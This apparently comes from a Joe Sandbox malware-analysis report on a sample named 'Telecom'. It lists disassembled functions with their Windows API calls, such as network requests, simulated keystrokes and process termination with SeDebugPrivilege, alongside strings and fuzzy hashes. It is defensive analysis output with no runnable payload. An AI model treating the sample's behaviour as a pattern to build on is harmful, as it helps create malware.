Instruction ID: 9576238abe2a9bbb8db8ab4895e8ffb2b0c14119093af336b6aeeb2dccbef053
Opcode Fuzzy Hash: 1a09967534182818491ebe948e7f7d15c134c1e58881522682d068188fc6c55e
Instruction Fuzzy Hash: 2421C2B5E00214BBDF00ABA5CC45EEFBBB8EF15304F004067B95197291C7798809DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004D44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004D4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004D453C
GetWindowLongW.USER32(?,000000F0), ref: 004D4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004D4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004D45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004D4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004D4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004D467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004D4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004D46AF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 34c432fed67f490aa85a8c959b1cd6f510482cae04f8e56f4bff708907488f9f
Instruction ID: 79b4b0af2db39f08643b8ef908070516b1caa73aea32372e91eb9026b32a92ce
Opcode Fuzzy Hash: 34c432fed67f490aa85a8c959b1cd6f510482cae04f8e56f4bff708907488f9f
Instruction Fuzzy Hash: 19619971A00208AFDB10DFA8CC91EEE77B8EF49704F10415AFA05A73A1C778A956DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00442AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00442AF9
OleUninitialize.OLE32(?,00000000), ref: 00442B98
UnregisterHotKey.USER32(?), ref: 00442D7D
DestroyWindow.USER32(?), ref: 00483A1B
FreeLibrary.KERNEL32(?), ref: 00483A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00483AAD

Strings

close all, xrefs: 00442AF4

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 81501c04ebff044282650fed2073d0a49fdd1fefcac24e57c7ca3e6e71378c65
Instruction ID: 92cd9aab4b6a77dcf09eddf020f40c62990637867610744b4e0fee10a58c0f9d
Opcode Fuzzy Hash: 81501c04ebff044282650fed2073d0a49fdd1fefcac24e57c7ca3e6e71378c65
Instruction Fuzzy Hash: 77D19D707012129FDB18EF15C995A6AF7A0FF04B05F5046AFE44A6B252CB79AD13CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004B8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8A06
GetFileAttributesW.KERNEL32(?), ref: 004B8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 004B8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 004B8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004B8AF5

Strings

*.*, xrefs: 004B8AAB

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 0a60d5fa2514d03426412df0ad8ce98ea034b9697f13e3d4956206d65e96467f
Instruction ID: 495b9506391acb29d6beb96c89dce719bee9fb58d92e30f7b796b0f2b0b94fb1
Opcode Fuzzy Hash: 0a60d5fa2514d03426412df0ad8ce98ea034b9697f13e3d4956206d65e96467f
Instruction Fuzzy Hash: 3E818EB19042059BDB24EE15C444ABBB3ECBF98310F58482FF885D7250EB38D945CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004D88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004D8992
IsWindowEnabled.USER32(00000000), ref: 004D899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 004D8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 004D8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 004D8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 004D8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004D8B1E

Strings

(Q, xrefs: 004D89D5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (Q
API String ID: 4072528602-2768264020
Opcode ID: 150c528682cef3398d961c6f50dce7ced22f306244bb57d36ca604a58e26430c
Instruction ID: 1d6d1be874401a17b5b6b8877fc4e1cdd1ce4940f6d8d9143ce16f5afac6886b
Opcode Fuzzy Hash: 150c528682cef3398d961c6f50dce7ced22f306244bb57d36ca604a58e26430c
Instruction Fuzzy Hash: 5171CEB4604204AFEB209F54C8A4FBB7BB9EF09300F14049FE98567361CB39A981DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00447447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 004474D7

Part of subcall function 00447567: GetClientRect.USER32(?,?), ref: 0044758D
Part of subcall function 00447567: GetWindowRect.USER32(?,?), ref: 004475CE
Part of subcall function 00447567: ScreenToClient.USER32(?,?), ref: 004475F6

GetDC.USER32 ref: 00486083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00486096
SelectObject.GDI32(00000000,00000000), ref: 004860A4
SelectObject.GDI32(00000000,00000000), ref: 004860B9
ReleaseDC.USER32(?,00000000), ref: 004860C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00486152

Strings

U, xrefs: 00486021

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 150e0b3b50ec989c8f2771abcd9543e7ea51c64363c777f5ad9a4824f49a4c3f
Instruction ID: 3c25e05793576962a17181244b29c9b8f884eba28ba48cc1fabdc2c94aa6c439
Opcode Fuzzy Hash: 150e0b3b50ec989c8f2771abcd9543e7ea51c64363c777f5ad9a4824f49a4c3f
Instruction Fuzzy Hash: 1771FF30500205EFCF21EF64C888ABE3BB1FF45314F158A6BED555A2A7C7388881EB59

Uniqueness

Uniqueness Score: -1.00%

Function 004BCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004BCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004BCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004BCD0F
GetLastError.KERNEL32 ref: 004BCD67
SetEvent.KERNEL32(?), ref: 004BCD7B
InternetCloseHandle.WININET(00000000), ref: 004BCD86

Strings

, xrefs: 004BCD00

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9fd12605c53f99648a932719c45fd63a9a90b1a8e2ffef11e2c7fdb845688254
Instruction ID: b219ca33ea2c9007dd78d22bfcfc4af749d88f4c68a41b120b8f6551e29b284e
Opcode Fuzzy Hash: 9fd12605c53f99648a932719c45fd63a9a90b1a8e2ffef11e2c7fdb845688254
Instruction Fuzzy Hash: 48316DB9A01204AFD721AF658CC8AEB7BFCEB45744B10456FF446D3200DB38D9059BB9

Uniqueness

Uniqueness Score: -1.00%

Function 004AA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,004855AE,?,?,Bad directive syntax error,004DDCD0,00000000,00000010,?,?), ref: 004AA236
LoadStringW.USER32(00000000,?,004855AE,?), ref: 004AA23D

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004AA301

Strings

Line %d:, xrefs: 004AA28C
Error: , xrefs: 004AA2CF
., xrefs: 004AA2E7
%s (%d) : ==> %s.: %s %s, xrefs: 004AA26B
Line %d (File "%s"):, xrefs: 004AA2A7

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 17f61539838ea4a974c3a05b387218bdc0eb6c315939244c06abd579727f5ff3
Instruction ID: fc96cf0d7e8a964b8e2009a06ff8392c84bb0ac1463c93c6709bf218d91839ac
Opcode Fuzzy Hash: 17f61539838ea4a974c3a05b387218bdc0eb6c315939244c06abd579727f5ff3
Instruction Fuzzy Hash: 63216172C0021DEBDF02AF90CC06EEE7B35FF18704F04446BB515651A2E779A528DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004A29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004A29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 004A2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004A2A9A

Strings

list, xrefs: 004A2A7C
details, xrefs: 004A2A48
SHELLDLL_DefView, xrefs: 004A2A19
largeicons, xrefs: 004A2A2E
smallicons, xrefs: 004A2A62

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 980b9b76c71733d98c22e116e7440e3e2be683df4d996eafa5ac81cb40d5a700
Instruction ID: 4ab39f927c6ce65da6a8f386f627cd4e3fafc9d017d946b2852053aeb4fa2b48
Opcode Fuzzy Hash: 980b9b76c71733d98c22e116e7440e3e2be683df4d996eafa5ac81cb40d5a700
Instruction Fuzzy Hash: F71129B6644307B9FA246229DD07DAB3B9CDF26728B200027F905E40D1FBEDA811655D

Uniqueness

Uniqueness Score: -1.00%

Function 00447567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0044758D
GetWindowRect.USER32(?,?), ref: 004475CE
ScreenToClient.USER32(?,?), ref: 004475F6
GetClientRect.USER32(?,?), ref: 0044773A
GetWindowRect.USER32(?,?), ref: 0044775B

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: d06989d9743e57ca49bcdab467242918275cd13073dc26088b99b8c9e6f3958e
Instruction ID: bbfadcb80422430a641a939acfeb3a1f73ff84a5f10ae12adbce347be35b0e98
Opcode Fuzzy Hash: d06989d9743e57ca49bcdab467242918275cd13073dc26088b99b8c9e6f3958e
Instruction Fuzzy Hash: 0FC18E3490464AEFEB10DFA8C540BEEB7F1FF08310F15841AE895A7350D738A942DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0047D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0047D237
_free.LIBCMT ref: 0047D2A2
_free.LIBCMT ref: 0047D2C8
_free.LIBCMT ref: 0047D2F1
_free.LIBCMT ref: 0047D329
_free.LIBCMT ref: 0047D35A
_free.LIBCMT ref: 0047D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0047D41C
_free.LIBCMT ref: 0047D435

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: f896c173682fe0afc75500361a46a2793606e9fa88e346f2f8eefbea24f4566b
Instruction ID: 40bf844ea0104775031ecdee5a0137c0f0e5b63a4eb0df5037cc5e54950773ac
Opcode Fuzzy Hash: f896c173682fe0afc75500361a46a2793606e9fa88e346f2f8eefbea24f4566b
Instruction Fuzzy Hash: 32611571D14300AFDB21AF65E9416EB7BB49F01324F04C1AFE94CA7286EA7D98018699

Uniqueness

Uniqueness Score: -1.00%

Function 004BCB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004BCBC7
GetLastError.KERNEL32 ref: 004BCBDA
SetEvent.KERNEL32(?), ref: 004BCBEE

Part of subcall function 004BCC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004BCCB7
Part of subcall function 004BCC98: GetLastError.KERNEL32 ref: 004BCD67
Part of subcall function 004BCC98: SetEvent.KERNEL32(?), ref: 004BCD7B
Part of subcall function 004BCC98: InternetCloseHandle.WININET(00000000), ref: 004BCD86

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 4cbf76951f0a80e53d11ecc7d207d835be34c55579352e8480b9f17078709cf2
Instruction ID: 36bc8d518d44b465e75652bebe02dd00651e0c7d66c16e72bdf00051bc72c2a2
Opcode Fuzzy Hash: 4cbf76951f0a80e53d11ecc7d207d835be34c55579352e8480b9f17078709cf2
Instruction Fuzzy Hash: C8318B71A01701AFDB219F65CDC4ABBBBB8FF54304B00452FF85A82610C739E815ABB8

Uniqueness

Uniqueness Score: -1.00%

Function 004A2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004A2F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004A2F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004A2F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004A2F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 004A2F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004A2F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004A2F74

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: ca0c68bb4c9f667b4a0da7738f8944598f7d0078e4364f8cd18d65251f4c50d8
Instruction ID: 292e1393a0516d9f9b7c82e7b1b6d7cf0170ad60fb1e7fa5b2d6e51a660566eb
Opcode Fuzzy Hash: ca0c68bb4c9f667b4a0da7738f8944598f7d0078e4364f8cd18d65251f4c50d8
Instruction Fuzzy Hash: 0501D430B84610BBFB1067699C8AF593F5ADB9EB11F100027F318AE1E4C9E664449AAD

Uniqueness

Uniqueness Score: -1.00%

Function 004A2150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004A1D95,?,?,00000000), ref: 004A2159
HeapAlloc.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A2160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004A1D95,?,?,00000000), ref: 004A2175
GetCurrentProcess.KERNEL32(?,00000000,?,004A1D95,?,?,00000000), ref: 004A217D
DuplicateHandle.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A2180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004A1D95,?,?,00000000), ref: 004A2190
GetCurrentProcess.KERNEL32(004A1D95,00000000,?,004A1D95,?,?,00000000), ref: 004A2198
DuplicateHandle.KERNEL32(00000000,?,004A1D95,?,?,00000000), ref: 004A219B
CreateThread.KERNEL32(00000000,00000000,004A21C1,00000000,00000000,00000000), ref: 004A21B5

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2688b9eb12e33e1cc2cb80ae86906ef67430b3697b230e328492abaa36d7346e
Instruction ID: a86858cd779bdfa345616d63e32816920075b40f01d9081a7a55eea9fd9baa52
Opcode Fuzzy Hash: 2688b9eb12e33e1cc2cb80ae86906ef67430b3697b230e328492abaa36d7346e
Instruction Fuzzy Hash: 9701BBB5641304BFE710AFA5DC4DF6B7BACEB89711F004422FA05DB1A1CA749C00CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004ACE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004441EA: _wcslen.LIBCMT ref: 004441EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004ACF99
_wcslen.LIBCMT ref: 004ACFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004AD047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 004AD075

Strings

<*Q, xrefs: 004ACEF6
,*Q, xrefs: 004ACF0C
0, xrefs: 004ACF5A

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: ,*Q$0$<*Q
API String ID: 1227352736-602050549
Opcode ID: 6317bb8cfc9b303eafeea018ee10c40bb129d4d4d8380df0f043de1156cc0193
Instruction ID: 723ed35c8b782915bc68914c4eebc6445ccda6859201fc97fe03645c0b4e9670
Opcode Fuzzy Hash: 6317bb8cfc9b303eafeea018ee10c40bb129d4d4d8380df0f043de1156cc0193
Instruction Fuzzy Hash: 1D51D471A083009FE7149F29C885BAB77E8AF66318F040A2FF592D32D0DB78C945875A

Uniqueness

Uniqueness Score: -1.00%

Function 004CAB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 004ADD87: CreateToolhelp32Snapshot.KERNEL32 ref: 004ADDAC
Part of subcall function 004ADD87: Process32FirstW.KERNEL32(00000000,?), ref: 004ADDBA
Part of subcall function 004ADD87: FindCloseChangeNotification.KERNEL32(00000000), ref: 004ADE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 004CABCA
GetLastError.KERNEL32 ref: 004CABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004CAC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 004CACC5
GetLastError.KERNEL32(00000000), ref: 004CACD0
CloseHandle.KERNEL32(00000000), ref: 004CAD21

Strings

SeDebugPrivilege, xrefs: 004CABEC

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

